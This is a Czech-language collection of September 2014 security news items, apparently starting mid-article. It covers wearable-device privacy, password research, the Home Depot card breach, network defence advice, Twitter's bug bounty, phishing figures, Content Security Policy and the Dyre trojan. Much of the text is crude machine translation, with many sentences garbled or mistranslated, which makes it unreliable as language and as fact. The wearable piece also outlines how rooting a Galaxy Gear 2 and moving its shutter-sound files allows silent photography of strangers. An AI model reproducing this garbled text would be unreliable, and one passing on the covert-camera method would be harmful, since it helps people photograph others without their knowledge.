Počítačoví zločinci používají reklamních sítí k distribuci malwaru let. Ve stejné době, reklamní trh roste rychle, odbočovat do nových platforem (velkých internetových stránek, populární aplikace, mobilní zařízení), získat nové inzerenty, partnery, zprostředkovatele a agregátory, které jsou vzájemně propojeny do velmi zamotané síti. Problém reklamní síť je ještě jeden příklad ukazující, že rychlý vývoj technologie není vždy doprovázen odpovídajícím vývojem bezpečnostních technologií.


Nositelný Bezpečnost: současnost a budoucnost
15.9.2014 Bezpečnost
Nyní, že internet věcí je v módě, chtěl jsem se podívat na trend v internetu věcí, které jsem si obzvlášť vzrušující, a to nositelné zařízení. Teoreticky wearables by nás staví před zásadní zvrat ve způsobu, jakým uživatelé pracují s technologií, pohybující se nás od staré myši a klávesnice combo, a možná dokonce i dotykový displej. Pro tuto chvíli nejsme úplně tam a sci-fi superlativy jsou předčasné. V tomto okamžiku, wearables jsou v nejjednodušších pojmech přídavky našich mobilních telefonů. Jsou určeny k pohodlněji předat oznámení, shromažďují tep měření a hodit alternativní úhel kamery do selfie naplněné směsí. Ačkoli wearables jsou stále ještě v plenkách, stoupá přijetí zdůrazňuje potřebu diskuse o obavy, že by mohly být přiloženy tyto nové technologie. Pojďme se nepokoušejte provádět tuto diskusi ve dvou režimech: aktuální otázky ochrany soukromí a budoucí celkové obavy o bezpečnost.

S Creepy Nadšení

Bohužel technologie není vždy v shovívavě dítě-jako, jak jsme v úmyslu; Pryč jsou dny, na pohled-co-jsem-si-do úžas.

Wearable_Security_2

Zdroj: http://www.killyourdarlingsjournal.com/wp/wp-content/uploads/2014/01/1963-Jetsons-flintstones.jpeg

Místo toho vidíme uživatelé adaptaci technologií staré a nové, aby splňovaly základní touhy. Nedávné twitter-storm dokumentuje Gawker ukázal, že, jak bylo zjištěno, čínský Glass Explorer pomocí svého nového zařízení nahrát nevyžádaných obrázky žen ve veřejných prostorách k jeho účtu na Twitteru. Jeho činy vešly do zavrženíhodného internetové subkultury fetishizing " creepshots ", které způsobilo velký rozruch. Bohužel, hlavní konstrukční principy wearables mít nezamýšlený důsledek tvorby dokonalé zařízení pro tuto komunitu zvrhlíků.

Díky nenápadné zařízení, a téměř nezjistitelné fotoaparát, přenosný může být použit jako dravé nástroj pro porušování soukromí nic netušících kolemjdoucích. Během našeho Analytici summitu Latinské Ameriky bezpečnosti , Roberto Martinez a vzal jsem si plášť dravých nositelná uživatelů, přičemž upřímné fotky našich hostů se zobrazí během naší prezentaci. Jsem zklamaný, že to bylo neuvěřitelně snadné se dostat pryč s. V případě Roberto sklenku, vzkaz (který umožňuje uživateli pořídit snímek jednoduše mrkl směrem k terči) bylo nezbytné pro náš experiment. V mém případě jsem měl Galaxy Gear 2, které Samsung se opatrně naprogramován tak, aby doprovázet obrázky s hlasitým, aby upozornila v blízkosti cíle.

Nicméně, popínavé rostliny nebudou snadno odradit! A roztok se rychle nabídl ve formě zakořenění a hrstky příkazů. Většina lidí jsou obeznámeni s pojmem zakořenění nebo jailbreaking zařízení v těchto dnech. To je často nabízený jako prostředek retaking ovládání vašeho zařízení, pryč ze spárů zlých omezení korporací! V případě Gear 2, použití zakořeňování jsou všechno, jen ne benevolentní. Spíše než rozpoutání homebrew rozvoje kreativity, výhradní použití zakořenění Gear 2, které jsem nebyl schopen na místě je zakázat středně hlasitý zvuk vydá zařízení tón upozornit kolemjdoucí, že jsou ve skutečnosti být fotografován.

V konkrétnějších podmínek, proces zahrnuje použití unikly interní nástroj společnosti Samsung s názvem ODIN, aby blikat alternativní ROM do zařízení, která přichází s oprávněním root povoleny. Root oprávnění není nutné, aby se sami nainstalovat aplikace, ale bude nutné, aby se namontovat jinak nepřístupné souborový systém. Jakmile je připojen, popínavá rostlina potřebuje pouze nula-in na složky, které obsahují zvukové soubory oznámení kameru a přesunout je jinde úschovy. Tak, když je obraz byla přijata, aplikace fotoaparát bude hledat tyto soubory v marné a pokračovat v přijímání obrazové sans zvuk závěrky. Vzhledem k tomu, že je fotoaparát zcela diskrétně umístěna, postrádá blesk, a nevykazuje jiné vnější náznak toho, že obraz je přijato, tento zvuk je rozhodující soukromí rys v designu zařízení.

S Tizen inteligentní Developer Bridge (připomínající Android Developer mostu) v ruce, semi-zdatní uživatelé mohou také boční zatížení aplikace ve formátu WGT na zařízení. V případě videozáznamů, změněný aplikace Fotoaparát lze sideloaded, který obsahuje jednu upravenou čáru v rámci balíčku a tím eliminuje předem uložená omezení na video záznam z několika sekund, stejně jako stísněný skladování dovolí. Tyto dvě modifikace umožňují perverzní uživateli otočit jinak benevolentní SmartWatch do poněkud strašidelný zařízení.

Méně zkoumány Link v Mobile Security řetězec

Wearable_Security_3

Zajímavým dopadem vyplývá ze schopnosti bočním zatížením upravené žádosti do zařízení s takovou lehkostí. I když aplikace Tizen slouží projít přísnou procesu testování, tento proces probíhá na straně řídicího zařízení - v tomto případě, Galaxy S5 zatížen app převodovky Správce spárované s SmartWatch. Pokud je aplikace nainstalována na zařízení přes Gear App Manager přes bluetooth, neexistují žádné náznaky, nebo oznámení o SmartWatch, že nová aplikace byla nainstalována. To jde zdůraznit nebezpečí, zjednodušené rozhraní na většině nositelná zařízení a tím i důležitost zachování integrity řídicího mobilního zařízení. S Android je primární cíl pro mobilní útočníky, rostoucí zájem spotřebitelů wearables je povinen splnit rostoucí útočníka zájem v těchto zařízeních a také, což nás přivádí k potenciálnímu straně naší diskuse ...

Laici zločinci nejsou jen něčí zájem o naše zařízení. Sofistikované herci mají zřetelný zájem na napadení mobilních zařízení, jakmile budou brány pro intimní informace o jednotlivých cílů se běžně vyskytují v podnikových sítích. I když by se v žádném případě tvrdit, že wearables jsou terčem těchto aktérů v této době, je dvojí odvolání předložila wearables, které dělají jim pravděpodobné budoucí cíl , pokud obecně přijaté spotřebiteli :

Za prvé, informace wearables zařízení shromáždí se chystá přilákat nové korporátní hráče do cyberespionage scény. Jsou-li wearables přijata dostatečně velký dav, se pojišťovny mají zájem o vylepšování a zdokonalování vzorců jejich zmírnění rizika se jonesing dostat své ruce na agregovaných vitálních funkcí a nefalšovaných cvičení detaily svých klientů. Tyto informace by se mohly promítnout do reálné peníze pro tyto společnosti a druh finanční pobídky je dost často na podporu méně než etické prostředky shromažďování informací.
Za druhé, musíme být ostražití a přijmout holistický přístup k bezpečnosti řetězce přístroje spárovány pro sdílení dat. Pokud jde o domácí nebo kancelářské sítě, zabezpečení koncových bodů nestačí . Každé zařízení v síti, i když je to tiskárna nebo zdánlivě neškodná síťové úložné zařízení, může představovat vstupní bod nebo prostředky vytrvalosti pro útočníka. Totéž platí s mobilními zařízeními a jejich méně sofistikované příslušenství.
Ve špionážní kampaň, porušení bezpečnosti mobilního zařízení je jen začátek. Častokrát, cenné informace budou k dispozici s dlouhodobým přístupem k zařízení, jak nic netušící cíl pokračuje o svém každodenním jednání. Vzhledem k tomu, že bezpečnostní řešení jsou již nasazeny na mobilních platformách, méně sofistikované přívěsky, jako wearables připojených mobilních zařízení by se mohla stát obzvláště zajímavé pro pokročilé aktéry hrozeb, kteří hledají prostředky k vytrvalosti s nižší pravděpodobnosti detekce. V tomto případě, odolnost a diskrétní provedení jsou zlaté standardy, a to, co je diskrétnější než působící v zařízení, jehož zjednodušené rozhraní a nepřístupné souborový systém v podstatě zajistit, že porušení bude nikdy být detekovány i nejpovolanějších uživatelů?


Dejte se na komplexní hesla, tvrdí Microsoft
12.9.2014 Zabezpečení
Internet je plný rad o tom, jak by se uživatelé měli jít o výběru silná hesla, a na to, co by se mělo webových administrátoři implementovat, aby se jim to, a to, co ochrana mechanismy by měly být použity k ochraně těchto účtů, ale v závislosti na skupině výzkumníků společnosti Microsoft a Carleton University v Kanadě, tam je málo k dispozici návod, který je skutečně nese jasné, pevné důkazy.

Do heslo složení politiky fungují? Má vypršení platnosti nucené heslo zlepšení bezpečnosti? Do výluky pomáhá chránit službu? Co si heslo metrů dosáhnout? To jsou jen některé z otázek, Dinei Florencio, Cormac Herley a Paul van OORSCHOT chtěl najít odpověď. "Navzdory dlouhým známých nedostatků v obou bezpečnosti a použitelnosti, hesla jsou vysoce nepravděpodobné, že zmizí," poukázali v nedávno vydala papír. Takže, vzali to na sobě průzkum stávající literaturu a pomocí "ground-up, první principy uvažování," mají zřejmě zjistil, co funguje a co ne. Podle vědců, uživatelé obvykle dají účty v různých kategoriích , většinou na základě možných následků účtu kompromis. Na jednom konci spektra jsou účty, které uživatelé považují za nedůležité a můžete vybrat slabá hesla. Na druhé straně jsou rozhodující účty chtějí chránit, jak nejlépe umí, protože obsahují informace, které nechcete ztratit, nebo odhalily, nebo kriticky vázána na jiné účty, a které často volí složitá hesla a další možnosti ochrany (jako je ověřování multi-faktor). Pro ​​uživatele je důležité nepoužívat stejné heslo pro účty v různých kategoriích. A webové správci by se měli snažit, aby odpovídajícím způsobem určit, v jakém prací kategorií jejich místo se dostane do, a zvolte možnost ochrany heslem a skladování. "Neměli bychom se rychle vyjádřit rozhořčení na učení, že password1 a 123456 jsou společné na veřejně zveřejněných seznamů heslo z napadených webů, jedná-li se nedělej péče účty v očích uživatelů. Nemělo by to být překvapením, že hesla uložená prostého textu na fantasy fotbalové stránky, "říkají vědci. Mezi věci, které vědci objevili , že skutečnost, že heslo pevnost přístroje jsou prakticky k ničemu, a tak jsou obvyklé návrhy pro výrobu delší a složitější heslo. Poukázali na to, že heslo, které bude odolávat on-line a off-line hádání hesla útoky jsou různé, a že "pokusy o získání uživatelům zvolit hesla, která budou bránit v režimu offline hádat, například tím, že složení politiky, poradenství a pevnosti metrů, musí být z větší části ohodnotili selhání. " "náročné hesla, která vydrží v režimu offline útok je přístup obrany do hloubky nutné pouze v případě, že místo se nepodařilo jak ochránit heslo souboru a detekovat únik a reagovat přiměřeně, "poznamenal také, že. Obrana "hesla proti on-line hovado nutit je odpovědnost, která by měla spočívat především na webových stránkách" uživatelů ramena správců (uživatelů mělo požadovat, jen si vybrat velmi časté hesla), jako by břemeno je chrání proti útokům off (hešováním a solení hesel, nebo pomocí reverzibilního šifrování a udržování dešifrovací klíč v bezpečí před rukou útočníků).


Montáž důkazy poukazují na Home Depot porušení
12.9.2014 Incidenty
Ještě oficiálně nepotvrzená, Home Depot hack vypadá čím dál pravděpodobnější, že se stalo. Když Nicole Perlroth uvedeno , zdrojem informací ukradené karty lze zjistit dvěma způsoby:

Donucovacích orgánů s pomocí bank můžete prohlédnout účtu historii transakcí postižených uživatelů ke společnému místě nákupu. To je to, co některé banky jsou v současné době dělá po koupi zpět čísla karet od podvodníků, které je prodávají.
Vyšetřovatelé podvodů obvykle nemají přístup k údajům o transakcích, ale lze použít údaje poskytnuté samotnými podvodníci (město, stát, a ZIP kód skladu, ze kterého byla karta ukradené) a zkontrolujte, zda je maloobchodník podezření, že byla porušena má obchody ve stejném PSČ.
Carders obvykle poskytují tento typ dat - a požádat o dodatečné platby za to - protože podvodníci, kteří používají padělané karty, bude chtít, aby se nákupy ve stejné oblasti, tak, aby se vydali systémy detekce podvodů bank. Vyzbrojeni touto informací, Brian Krebs sestavil seznam jedinečných poštovních směrovacích čísel svázaných s údaji o platebních karet z šarží aktuálně nabízených k prodeji na rescator (tečka) com , a porovnala je se seznamem jedinečných Home Depot poštovních směrovacích čísel. výsledek? 99,4 procent se překrývají. "Mezi těmito dvěma seznamy poštovních směrovacích čísel, tam jsou 10 poštovní směrovací čísla v údajích karet Rescator, že neodpovídají skutečným obchodů Home Depot," sdílel. Ale zdůraznil, že údaje v současné době na prodej je pravděpodobné, že jen "malý zlomek z karet, že jeho obchod bude uvedena do prodeje v nejbližších dnech a týdnech," což znamená, že seznam by mohl nakonec mít 100 procent překrývání. Pokud Home Depot byla skutečně porušena a informace z bankovních zdrojů o porušení, co byla zahájena v dubnu nebo začátkem května, je v pořádku, říká, že toto porušení mohlo ukázat, že je mnohem větší, že cíl je , který byl objeven po třech týdnech a vliv menšího počtu obchodů. Stále žádné zprávy o této věci od Home Depot, jehož mluvčí pouze potvrdila, že forenzní společnosti a bezpečnostní týmy vyšetřují potenciální porušení, a že oni přinesli Symantec a FishNet Bezpečnostní experti na pomoc při vyšetřování. Pokud Home Depot nakonec se ukáže, že byly porušeny, to bude zajímavé zjistit, jak se útočníci to povedlo. nedávném rozhovoru s Chrisem Hadnagy, generální ředitel společnosti Sociálně-Engineer, as, která provozuje sociální inženýrství Capture the Flag ( SECTF) u DEF CON, bylo zjištěno, že v letošním roce se tým, který byl přidělen úkol těžby potenciálně citlivé informace od zaměstnanců Home Depot byl nejúspěšnější a skončil vítězství v soutěži. "Téma letošní soutěže bylo maloobchod, na základě Cílová porušení odhalily v letošním roce, "Hadnagy sdílené Dark Reading. Chtěli zjistit, zda toto porušení vyzval prodejce, aby se více opatrní a v nejvyšší pohotovosti. "Bohužel, nebylo jedna společnost, kdo to udělal dobře. Ani jedno, kdyby byli svým klientům, by dostali známku potkávací." Během této falešném útoku, několik zaměstnanců Home Depot udělal otázku, proč se společnosti "IT oddělení" byla ne volání z podnikové řady, ale byl nakonec uklidněn vysvětlení sociálních inženýrů a požadované informace poskytlo. Pouze jeden zaměstnanec považován za hovor podezřelé a skončil bez rozdávání žádné informace.


Zranitelnosti sítě IT administrátoři mohou používat pro ochranu své sítě
12.9.2014 Zranitelnosti
Být schopen přizpůsobit se změnám je jednou z nejdůležitějších schopností v oblasti zabezpečení dnes, hlavně proto, že útoky na obranu proti jsou schopni udělat totéž. Vyspělost současných hrozeb je vidět především v jejich schopnosti přizpůsobit na základě slabých životního prostředí, které se zaměřují. V tomto příspěvku se budeme snažit vidět sítím, jak útočníci je vidět - přes jejich zranitelnosti - a zase to asi do vedení na to, jak správcům IT by měl chránit své sítě. Lidé jsou nejslabším článkem Lidé budou vždy zůstane citlivá na vnější podněty, a to zejména těch, které vyvolá silné emoce. To je důvod, proč sociální inženýrství bude vždy součástí útoků - existuje mnoho technik, které mají být použity, a vysoká pravděpodobnost účinnosti. Přijímání předpoklad, že lidé budou vždy stane obětí útoků sociálního inženýrství je důležité pro IT administrátoři jednoduše proto, že je to pravda. Musí bezpečnostní síť by měla být navržena s ohledem na tuto skutečnost, bez ohledu na to, jak orientované jsou zaměstnanci. Mohou IT administrátoři: 1. Konfiguraci sítě, aby se zabránilo nejen útočníkům dostat se do sítě, ale také získávání dat z něj. Tímto způsobem, i když je útočník schopen získat kontrolu nad strojem v síti, exfiltrating žádné kradené údaje bude obtížné. Řádně spravovány řízení přístupu Firewall a síť by výrazně pomoci tohoto cíle dosáhnout. Inteligence hrozba bude také hrát velkou roli zde také, jako IP adres používaných jako C & Cs útoků. 2. Segment sítě v závislosti na úrovni zabezpečení systémy potřebují. Kritické systémy musí být odděleny od "normální" ty, ať už fyzicky nebo prostřednictvím segmentu sítě, které jsou připojené k. Kromě nich je však vzdělávání zaměstnanců je stále důležitá a měla by být pravidelně dělat. nejbezpečnější místo je nejnebezpečnější Dokonce i ty nejmenší mezery zabezpečení v rámci sítě může vést k největším porušení. Útočníci vědí dobře, a to je důležité pro IT administrátorům udržovat ji v mysli. Síť by měla být předmětem auditu pravidelně, aby se ujistil, že všechny plochy jsou řádně zajištěny. Například IT administrátoři se nemusí brát v úvahu, že oni sami jsou potenciálními cíli, nebo že určité zařízení v síti může být také infekce body, jako jsou Síťová tiskárna nebo dokonce router . Totéž platí i pro webové administrátory. Útočníci se nemusí přímo porušit vysoce zabezpečené stránky, jako je například bankovnictví webové stránky, místo toho, kontrola dalších místech ve stejném DMZ (demilitarizovaná zóna), kompromis je, a využít důvěru-vztah provést útok side-channel proti bankovním webu. Lidé používají slabá hesla Není žádným tajemstvím, že pro správu hesel, je výzvou pro většinu uživatelů, tak pracuje na základě předpokladu, že všichni členové sítě mají bezpečná hesla prostě není možné. Pro zajištění sítě za předpokladu, že uživatelé mají nezabezpečené hesla by vyžadovaly provádění dalších opatření, ověřování, jako dvoufaktorové autentizace , nebo dokonce biometrických údajů. Síť je pronásleduje duch stroje Všechny sítě mají duchy strojů v nich. Jedná se o stroje, které nejsou nalezené v síti topologie mapě, ale jsou připojeny k síti. Ty se mohou skládat z "osobních zařízení, externích partnerů zaměstnanců zařízení nebo strojů, které by měly být v důchodu, ale nejsou. Útočníci páka na těchto strojích, protože poskytují jak přístup k síti a stealth. Za účelem obrany správci IT musí být zájem o monitorování systémů, které jsou připojeny k síti. Je třeba, aby zavedla mechanismus řízení přístupu k síti sledovat a řídit úroveň přístupu těchto duchů stroje jsou oprávněni v síti. Staré zranitelnosti jsou spolehlivé a mohou být stále používány Posouzení a řešení softwarové zranitelnosti je rozhodující proces pro každého správce IT, a měl by vždy pokrýt všechny chyby - nové i staré. IT správcům je třeba mít na paměti, že zranitelnost zůstane hrozba k síti, pokud nejsou řešeny, bez ohledu na to, jak dlouho jeho byla, protože to bylo objeveno. Autor: Ziv Chang, ředitel Cyber ​​bezpečnostní řešení na Trend Micro .


Twitter spouští bug bounty programu
12.9.2014 Sociální sítě
Díky jednoduché pípání , Twitter oficiálně zahájila svůj vlastní chyba nájemný program.

Nastavení pomocí odezvy bezpečnost a bug nájemný platformy HackerOne, Program nabízí minimálně 140 dolarů za hrozbu. Maximální výše odměny nebyla definována. Společnost je v současné době žádá o chybách lovce, aby předložily zprávy o chybách na jeho Twitter.com domény a subdomény (ads.twitter.com, apps.twitter.com, tweetdeck.twitter.com a mobilní .twitter.com) a jeho iOS a Android Apps. "Každý návrh nebo realizaci problém, který je reprodukovatelné a podstatně ovlivňuje bezpečnost uživatelů účtu Twitter, je pravděpodobné, že bude v rámci pro program," upozornila společnost ven. "Běžné příklady zahrnují: Cross Site Scripting (XSS), Cross Site Request Padělek (CSRF), Vzdálené spuštění kódu (RCE), neoprávněný přístup k chráněné tweetů, neoprávněný přístup k DMS, a tak dále." Zprávy o chybách na jiných vlastnostech Twitter nebo aplikace jsou vítány, ale nebude mít nárok na peněžní odměnu - bug lovci budou muset spokojit s uvedením na Twitteru síně slávy, která je již naplněn jmény 44 hackery. Ve skutečnosti program, hlášení chyb Twitteru na HackerOne byl až po dobu tří měsíců a teď, ale společnost teprve nyní oznámila, že začne vyplácet odměnu ve. Zatím 46 nahlášených chyb byly uzavřeny bezpečnostním týmem společnosti, ale zprávy byly přijaty před 3. září 2014, nemají nárok na peněžní odměny. "Udržování bezpečnosti prvotřídní Online je společné úsilí komunity, a my jsme štěstí, že pulzující skupinu nezávislých bezpečnostních výzkumníků, kteří dobrovolně věnují svůj čas, aby nám pomohli odhalit potenciální problémy," poznamenal společnost s tím, že program chyba štědrost byla zahájena na "rozpoznat jejich úsilí a důležitou roli, kterou hrají v udržování Twitter bezpečné pro každého." Máte-li zájem o více informací o chybách nájemní programy, zkontrolujte Poučení z provozu 95 chyb Bounty programy Casey Ellis, generální ředitel společnosti Bugcrowd.


80% firemních uživatelů je schopen rozpoznat phishingové podvody
12.9.2014 Phishing
McAfee Labs ukázal, že phishing je nadále účinná taktika pro infiltraci podnikové sítě. schopnost Testování obchodních uživatelů odhalovat podvody online, McAfee Phishing kvíz odhalil, že 80% z jeho účastníků se nepodařilo zjistit alespoň jeden ze sedmi phishingových e-mailů. Kromě toho, výsledky ukázaly, že finance a oddělení lidských zdrojů, kteří nejsou držiteli některé z nejvíce citlivých firemních dat, provádí nejhorší na odhalování podvodů, zaostávají s náskokem 4% na 9%.

Vzhledem k tomu, hrozeb posledního čtvrtletí zpráva McAfee Labs shromáždila více než 250 tisíc nových phishingových URL, což vede k celkové výši téměř jednoho milionu nových míst v uplynulém roce. Ne jen, že zvýšení celkového objemu, došlo k výraznému nárůstu propracovanosti phishingových útoků vyskytujících se v přírodě. Výsledky ukázaly, jak masovou kampaň phishing a kopí phishingu jsou stále na denním pořádku ve strategiích útoku používají zločinci po celém světě. Mezitím Spojené státy nadále hostit více podvodných adres URL, než kterákoli jiná země. "Jednou z velkých výzev, jimž dnes čelíme je zvýšení kvality technologií jádra na internetu, aby lépe vyhovovala hlasitost a citlivost dopravy, nyní nese," řekl Vincent Weafer, senior viceprezident McAfee Labs. "Šifrování Každý aspekt důvěry řetězce bylo přerušeno v posledních několika letech, od hesel OpenSSL veřejný klíč a nejnověji zabezpečení USB. Infrastruktury, které jsme tak do značné míry závisí na závisí na technologii, která nedrží krok se změnami a již splňuje dnešní požadavky. " Nálezy také odhalil nové počítačové kriminality příležitosti došlo od data uveřejnění Heartbleed zranitelnosti , jako odcizená data ze stále zranitelné webové stránky je V současné době se prodávají na černém trhu. Seznamy neopravených webových stránek se rychle staly seznamy hit pro zločinci a nástroje jsou snadno dostupné pro důlní neopravených stránek. Pomocí těchto nástrojů je možné svázat dohromady automatizovaný systém, který se zaměřuje známé zranitelné stroje a extrahuje citlivé informace. Každé čtvrtletí tým McAfee Labs více než 400 multidisciplinárních výzkumných pracovníků v 30 zemích, následuje kompletní řadu hrozeb v reálném čase, identifikace aplikační zranitelnosti, analýze a korelaci rizika a umožňující okamžitou nápravu chránit podniky a veřejnost. Další nálezy: Provoz Tovar: McAfee připojil globální donucovacím a ostatní, aby se GameOver Zeus a CryptoLocker tím, že blokuje více než 125.000 CryptoLocker domén a sinkholing v přebytek 120.000 GameOver Zeus domén. Nicméně, copycats jsou na vzestupu, vytváří nové varianty ransomware nebo finančního cílování malware pomocí unikly Zeus zdrojový kód. Růst v malware: Nové vzorků malwaru vzrostl pouze o 1% ve druhém čtvrtletí. Nicméně, s více než 31 milionů nových vzorků, je to stále největší množství zaznamenán v jedné čtvrtině. Celkový počet mobilních malware vzrostl o 17%, ve druhém čtvrtletí, zatímco míra nových malware Zdá se, že ustálil na zhruba 700 tisíc za čtvrtletí. Síťové hrozby: popření servisních útoků vzrostl o 4% ve druhém čtvrtletí a zůstávají Nejrozšířenějším typem síťové hrozby.


Kritická Bezpečnostní kontroly přijetí a provádění
12.9.2014 Zabezpečení
Nová SANS průzkum hlásí 90% organizací, které se průzkumu přijaly některé nebo všechny z kritických bezpečnostních kontrol (CSCS) a že finanční a vládní průmyslu jsou přední osvojitelé těchto kontrol. "Organizace v celé řadě průmyslových odvětví dosahují stabilní pokrok směrem k přijímání, integraci a automatizaci CSCS, "říká James Tarala, SANS analytik a autor příspěvku výsledků průzkumu. "Stále existují problémy, které inhibují přijetí všech ovládacích prvků. Otázky personální obsazení, chybějící rozpočet a sil, které omezují komunikaci mezi IT bezpečnost a operace nadále překážky osvojitele setkání." 2014 V tomto průzkumu 63% respondentů obviňoval adopci trápení na Nedostatečné personální obsazení a personální zdroje, 54% uvedlo nedostatek rozpočtu a 36% vinu problémy adopce na probíhající odpojení mezi provozními a bezpečnostními sil. To jsou hlavní problémy zjištěné při průzkumu v loňském roce, které nezmizely. Ne všichni přijali všechny ovládací prvky, ani nejsou podle pořadí ovládacích prvků v současné době uveden jako 1-20. Ale ti, kteří jsou schopni měřit zlepšení z kontroly, že jsem přijatá, 24% uvedlo jasnější viditelnost, 16% si všiml ovládacích lepší držení těla rizik a 11% zlepšila jejich schopnost detekce pokročilých útoků. "Průzkum identifikuje řadu věcí Rady o kybernetické bezpečnosti [který hostí ovládací] může udělat pro podporu komunity osvojitele, říká Tony Sager, ředitel SANS Inovačního centra a hlavní technolog pro Radu o kybernetické bezpečnosti. "Například, mohou použít další pokyny a případové studie , kterou právě pracujete. " Potřeba více použitelných případových studií úspěšných implementací bylo identifikováno 65% respondentů, zatímco 54% uvedlo, že potřebujeme lepší provozní osvědčené postupy. Vzhledem k tomu, že primární sektory jsou zastoupeny v tomto průzkumu byly finanční a vládní instituce, vytváření pokynů pro tato dvě odvětví by skvělé místo pro start sdílení nových informací o osvědčených postupech z těch, kteří pracují v přední linii napříč těmito sektory .. Sager dodává: "Kontroly nejsou o tom mít nejlepší seznam věcí, které dělat, oni jsou o členech komunity navzájem pomáhat zlepšit jejich bezpečnost! "


9 způsobů, jak chránit data na vašem smartphonu
12.9.2014 Mobil

Poslední titulky nahých fotek hollywoodských celebrit "unikající na internetu připomínají soukromí rizik čelíme, když ukládáme osobní údaje - zejména velmi osobní údaje, -., O inteligentních zařízení Chcete-li nyní plnou využitelnost Vašeho telefonu, ale ne chcete, aby vaše soukromé okamžiky, finanční informace nebo celulitida stříkající po celém internetu, postupujte podle následujících devíti doporučení Catalin Cosoi, šéf bezpečnostní stratég BitDefender: . Vyvarujte se ukládání obrázků lokálně na vašem notebooku, chytrého telefonu nebo tabletu loňském roce celkem 290.651 zařízení, jako jsou jako notebooky, chytré telefony a tablety byly hlášeny ukradl ve Velké Británii. Krádež Smartphone je tak běžné, že v USA, všechna zařízení budou předem vybaven schopností proti krádeži příští rok. Udržujte bezpečné zálohy na pevném disku nebo jiných méně přenosných zařízení pro bezpečné uložení důvěrných a citlivých dokumentů. Ujistěte se, že pevný disk je veden v dostatečné vzdálenosti od připojení k internetu, jako každý internetový připojené zařízení může být otevřené dveře pro hackery v určitém okamžiku. šifrování, šifrování, šifrování. může zdát overhyped funkčnost, ale aby vaše údaje undecipherable pro hackery je silná obrana. Zařízení se systémem Android nejnovější generace mají zabudovanou funkci šifrování kompletní zařízení, které lze šifrovat veškerá data, včetně aplikací, stažené soubory a obrázky. Chraňte své účty u silných a složitých hesel. Použijte symboly, číslice a velká písmena, nebo dokonce podivné fráze zamknout cloud obsah před zvědavýma očima. Zkuste rozostřit svou tvář na potenciálně kompromitujících snímků. byste nechtěli vaše nemorální selfies se objeví na Twitter, Reddit nebo Facebook byste? Nepoužívejte napište své soukromé fotografie. E-mailové účty, a to zejména těch, kteří nemají dvě -faktoru ověřování povoleno, jsou snadným cílem pro hackery, kteří se snaží ukrást vaše osobní údaje a intimní fotografie. Formátování paměťové karty nebo vnitřní paměti. Když prodáváte nebo půjčit telefon, ujistěte se, že formát a přepsat data se zabezpečeným mazání nástroj k Ujistěte se, že nic nezůstane. důvěrné informace nesmí sdílet na otevřených Wi-Fi hotspotů , pokud používáte správné mobilní bezpečnostní řešení pro blokování nevyžádaných připojení. Hackeři mohou sledovat svůj provoz a zajistěte si své bankovní pověření a kompromitující fotografie bez vašeho vědomí. Zakázat automatické obrázky pro cloud storage řešení, jako je iCloud a Dropbox. těchto služeb, tak užitečné, jak by se mohlo zdát, vytvořit cloudové verze vašich snímků bez Filtrování vaše nejcitlivější soubory z těch neškodných.


Obsah bezpečnostní politiky (CSP) roste.
12.9.2014 Zabezpečení
Mluvili jsme zde o obsahu bezpečnostní politiku (CSP) v minulosti. CSP se snaží řešit docela obtížný problém. Pokud jde o cross-site-scripting (XSS), prohlížeč a uživatel je obvykle oběť, ani ne tak server, který je náchylný k XSS. V důsledku toho, že je mnoho smyslu pro přidání ochrany do prohlížeče, aby se zabránilo XSS. To není snadné, protože prohlížeč nemá ponětí, co Javascript (nebo jiný obsah) očekávat od určitého místa. Microsoft implementoval jednoduchý filtr v IE 8 a vyšší, odpovídající obsahu předložené uživatelem na obsah odráží zpět na místo, ale tento přístup je poměrně omezený.

CSP je pokus definovat politiku informuje prohlížeč o tom, co očekávat od obsahu webu. Zpočátku, pouze Firfox podporován CSP. Ale v poslední době, CSP se vyvinul do standardu a ostatní prohlížeče začal ji [1] provádět. Velmi zrnitý langauge definován CSP umožňuje stránky přesně určit, jaký obsah je "legální" na určitém místě.

Implementace CSP na novém místě není tak strašné těžké, a může dokonce vést k čistší stránky. Ale nejtěžší je realizovat CSP na stávajících místech (jako jsou této stránce). Stránky růst "organicky" v průběhu let, a je těžké se vrátit později a definovat politiku. Jste povinni narazit na falešných poplachů, nebo vaše politika je uvolněná do bodu, kdy se stává smysl.

Naštěstí, CSP má mechanismus aby nám pomohl. Jste schopni definovat "Report URL" a prohlížečů bude hlásit všechny chyby, které se objevily na uvedené adresy URL. Zprávy jsou poměrně snadno čitelné JSON úryvky včetně stránky, která způsobila problém, politice, kterou porušil, a dokonce i výpis z části stránky, který problém způsobil.

V poslední době se několik pěkných nástrojů se vyskytly, aby bylo snazší analyzovat tyto zprávy a stavět CSP. Například Stuart Larsen realizován "CASPR" [2], plugin pro Chrome, který byl postaven na vytvoření CSP a analyzovat zprávy. Nástroje, jako je tento, aby provádění CSP mnohem jednodušší.

Jakékoliv jiné nástroje nebo zdroje, které chcete implementovat CSP?

Aktualizace: Dostali jsme pár dalších zdrojů v přes Twitter:

Pomocí "Virtuální optickými konektory" realizovat CSP na webové Application Firewall
účtu Twitter se zaměřením na CSP: http://twitter.com/SeeEssPee

Díkyimeleven za zdůraznění, že Firefox byl první prohlížeč podporuje CSP. On také poukázal na tento snímek palubě: http://www.slideshare.net/imelven/evolving-web-security-model-V11-Portland-OWASP-may-29-2014

[1] http://www.w3.org/TR/CSP/
[2] http://caspr.io


Salesforce varuje zákazníky před novým trojským koněm

11.9.2014 Viry
Na uživatele Salesforce.com se zaměřuje nová verze trojského koně, která doposud cílila hlavně na internetové bankovnictví velkých finančních institucí.

Nový trojský kůň se jmenuje Dyre nebo Dyreza a objevil se v červnu. Stejně jako většina trojských koní zaměřujících se na internetové bankovnictví, i tento se snaží o napojení do procesů webového prohlížeče tak, aby zachytil vložené přihlašovací údaje uživatele. Původní verze Dyre nalezená v červnu výzkumníky z PhishMe a CSIS Security Group se zaměřovala na stránky Bank of America, NatWest, Citibank, RBS a Ulsterbank. Tvůrci červa však na tento seznam nyní přidali i Salesforce.com.

„3. září 2014 jeden z našich bezpečnostních partnerů zjistil, že červ Dyre (známý také jako Dyreza), který se typicky zaměřuje na uživatele velkých a známých finančních institucí, může cílit také na uživatele Salesforce,“ uvedlo Salesforce v prohlášení na svých webových stránkách.

